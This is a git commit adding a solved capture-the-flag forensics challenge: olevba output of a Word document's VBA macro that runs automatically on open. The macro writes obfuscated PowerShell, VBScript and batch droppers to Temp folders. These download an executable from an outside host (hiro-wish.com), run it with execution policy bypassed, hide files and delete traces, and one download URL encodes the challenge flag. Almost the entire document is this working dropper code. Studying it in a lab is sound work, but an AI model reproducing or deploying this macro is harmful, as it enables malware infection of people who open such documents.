add solved giveaway challenge

2021-12-04 18:09:08 +01:00
parent 190fd7ca7a
commit eeaad4c421
5 changed files with 524 additions and 0 deletions
--- a/forensics/giveaway/macros.vba
+++ b/forensics/giveaway/macros.vba
@@ -0,0 +1,317 @@
+olevba 0.60 on Python 3.9.8 - http://decalage.info/python/oletools
+===============================================================================
+FILE: christmas_giveaway.docm
+Type: OpenXML
+-------------------------------------------------------------------------------
+VBA MACRO ThisDocument.cls 
+in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+Sub Auto_Open()
+    h
+End Sub
+Sub h()
+Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
+     USER = Environ("username")
+     PST1 = "adobeacd-update.p" + Chr(115) + "1"
+     BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t"))
+     ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
+     VBT1 = "adobeacd-update." + Chr(118) + "bs"
+     VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s"
+     
+
+     MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
+     ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
+     MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
+     MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
+     XPFILEDIR = "c:\Windows\Temp\" + VBTXP
+     XPBARTFILEDIR = "c:\Windows\Temp\" + BART
+     
+      On Error Resume Next
+     SetAttr MY_FILENDIR, vbNormal
+     
+     If (Len(Dir(MY_FILENDIR)) <> 0) Then
+      Kill MY_FILENDIR
+     End If
+     
+     On Error Resume Next
+     SetAttr MY_FILEDIR, vbNormal
+     If (Dir(MY_FILEDIR) <> "") Then
+      Kill MY_FILEDIR
+     End If
+     
+     On Error Resume Next
+     SetAttr MY_FILDIR, vbNormal
+     If (Dir(MY_FILDIR) <> "") Then
+      Kill MY_FILDIR
+     End If
+     
+     On Error Resume Next
+     SetAttr XPFILEDIR, vbNormal
+     If (Dir(XPFILEDIR) <> "") Then
+      Kill XPFILEDIR
+     End If
+      
+     Dim FileNumber As Integer
+     Dim FileNumb As Integer
+     Dim FileNu As Integer
+     Dim mttt As Integer
+     Dim retVal As Variant
+     'Dim winver As Integer
+     FileNumber = FreeFile
+     FileNumb = FreeFile
+     FileNu = FreeFile
+     
+     Dim objWMIService As Variant
+    Dim colOperatingSystems As Variant
+    Dim objOperatingSystem As Variant
+    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
+    Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
+    For Each objOperatingSystem In colOperatingSystems
+        SysReport = SysReport & "The operating system on this computer is " & _
+            objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
+    Next
+     
+     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
+     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
+     For Each objOperatingSystem In colOperatingSystems
+        winverstr = objOperatingSystem.Version
+    Next
+    
+    
+    winver = Val(winverstr)
+    WaitFor (1)
+     
+     
+If (winver > 5.5) Then
+     Open MY_FILENDIR For Output As #FileNumber
+     Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';"
+     Print #FileNumber, "$hash = '0';"
+     Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
+     Print #FileNumber, "$url  = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';"
+     Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
+     Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
+     Print #FileNumber, "$down" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
+     Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
+     Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
+     Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
+     Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
+     Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
+     Print #FileNumber, "Start-Sleep -s 15;"
+     Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
+     Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
+     Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
+     Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
+     Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
+     Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
+     Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
+     Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
+     Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
+     Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
+     Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
+     Close #FileNumber
+    
+    Open MY_FILDIR For Output As #FileNumb
+    Print #FileNumb, "Dim dff"
+    Print #FileNumb, "dff = 68"
+    Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
+    Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
+    Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
+    Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
+    Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
+    Close #FileNumb
+    
+    Open MY_FILEDIR For Output As #FileNu
+    Print #FileNu, "@echo off"
+    Print #FileNu, "ping 1.1.2.2 -n 2"
+    Print #FileNu, "chcp 1251"
+    Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
+    Print #FileNu, "exit"
+    Close #FileNu
+       
+    SetAttr MY_FILENDIR, vbNormal
+    SetAttr MY_FILEDIR, vbNormal
+    SetAttr MY_FILDIR, vbNormal
+     
+    WaitFor (1)
+    
+    retVal = Shell(MY_FILEDIR, 0)
+End If
+
+If (winver <= 5.5) Then
+     Open XPBARTFILEDIR For Output As #FileNu
+     Print #FileNu, "@echo off"
+     Print #FileNu, "ping 1.1.2.2 -n 2"
+     Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
+     Print #FileNu, "ping 1.1.2.2 -n 2"
+     Print #FileNu, "c:\Windows\Temp\444.exe"
+     Print #FileNu, ":loop"
+     Print #FileNu, "ping 1.1.2.2 -n 1"
+     Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
+     Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
+     Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
+     Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
+     Print #FileNu, "exit"
+     Close #FileNu
+     WaitFor (2)
+     mttt = 88
+
+     Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String
+
+    HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
+     cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
+     fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
+     fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
+     ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
+     FVpHoEqBKnhPO = Replace("christmas", "i", "1")
+     FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)
+
+     Open XPFILEDIR For Output As #FileNumber
+     Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO"
+     Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
+     
+     Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
+     Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
+     
+     Print #FileNumber, "objXMLHTTP.send() "
+     Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
+     
+     Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
+     
+     Print #FileNumber, "objADOStream.Open "
+     Print #FileNumber, "objADOStream.Type = 1"
+     Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
+     Print #FileNumber, "objADOStream.Position = 0 "
+     Print #FileNumber, "objADOStream.SaveToFile strTecation "
+     Print #FileNumber, "objADOStream.Close "
+     Print #FileNumber, "Set objADOStream = Nothing "
+     Print #FileNumber, "End if "
+     Print #FileNumber, "Set objXMLHTTP = Nothing"
+     Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
+     Close #FileNumber
+     
+     WaitFor (1)
+     
+     retVal = Shell(XPBARTFILEDIR, 0)
+     
+     
+End If
+
+     
+     findTest
+    secondTest
+    For Each myStoryRange In ActiveDocument.StoryRanges
+    With myStoryRange.Find
+        .Text = "<" & "sel" & "ect>"
+        .Replacement.Text = " "
+        .Wrap = wdFindContinue
+        .Execute Replace:=wdReplaceAll
+    End With
+    Next myStoryRange
+
+    For Each myStoryRange In ActiveDocument.StoryRanges
+    With myStoryRange.Find
+        .Text = "</s" & "ele" & "ct>"
+        .Replacement.Text = " "
+        .Wrap = wdFindContinue
+        .Execute Replace:=wdReplaceAll
+    End With
+    Next myStoryRange
+    
+    For Each myStoryRange In ActiveDocument.StoryRanges
+    With myStoryRange.Find
+        .Text = "<" & "in" & "box>"
+        .Replacement.Text = " "
+        .Wrap = wdFindContinue
+        .Execute Replace:=wdReplaceAll
+    End With
+    Next myStoryRange
+
+    For Each myStoryRange In ActiveDocument.StoryRanges
+    With myStoryRange.Find
+        .Text = "</" & "in" & "box>"
+        .Replacement.Text = " "
+        .Wrap = wdFindContinue
+        .Execute Replace:=wdReplaceAll
+    End With
+    Next myStoryRange
+     
+
+End Sub
+Sub WaitFor(NumOfSeconds As Long)
+Dim SngSec As Long
+SngSec = Timer + NumOfSeconds
+
+Do While Timer < SngSec
+DoEvents
+Loop
+
+End Sub
+
+Sub AutoOpen()
+    Auto_Open
+End Sub
+Sub Workbook_Open()
+    Auto_Open
+End Sub
+Sub findTest()
+Dim firstTerm As String
+Dim secondTerm As String
+Dim rrtt As Range
+Dim selRange As Range
+Dim selectedText As String
+
+Set rrtt = ActiveDocument.Range
+firstTerm = "<se" & "lect>"
+secondTerm = "</sel" & "ect>"
+ASKASAIEJ = "ask as8d j vnbnfghfthfth sad"
+With rrtt.Find
+.Text = firstTerm
+.MatchWholeWord = True
+.Execute
+ASKUKKIEJ = "aasdlkasjdask as8d j vnbnfghfthfth sad"
+rrtt.Collapse direction:=wdCollapseEnd
+Set selRange = ActiveDocument.Range
+selRange.Start = rrtt.End
+.Text = secondTerm
+.MatchWholeWord = True
+.Execute
+ASKSASADW = "asjldklas"
+rrtt.Collapse direction:=wdCollapseStart
+selRange.End = rrtt.Start
+selectedText = selRange.Delete
+End With
+End Sub
+
+Sub secondTest()
+Dim firstTerm As String
+Dim secondTerm As String
+Dim myRanget As Range
+Dim yytt As Range
+Dim selRanget As Range
+Dim selectedTextt As String
+
+Set yytt = ActiveDocument.Range
+firstTerm = "<in" & "box>"
+secondTerm = "</in" & "box>"
+ASKIEJSASAHBDJ = "ask as8d j asdasl;a adfsdvsdgsdfsdf sad"
+With yytt.Find
+.Text = firstTerm
+.MatchWholeWord = True
+.Execute
+ASKIEJ = "ask as8d j vnbnfghfthfth sad"
+yytt.Collapse direction:=wdCollapseEnd
+ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a adfsdvsdgsdfsdf sad"
+Set selRanget = ActiveDocument.Range
+selRanget.Start = yytt.End
+.Text = secondTerm
+.MatchWholeWord = True
+.Execute
+ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a adfsdvsdgsdfsdf sad"
+yytt.Collapse direction:=wdCollapseStart
+selRanget.End = yytt.Start
+selectedTextt = selRanget
+selRanget.Font.Color = wdColorBlack
+End With
+End Sub
+
+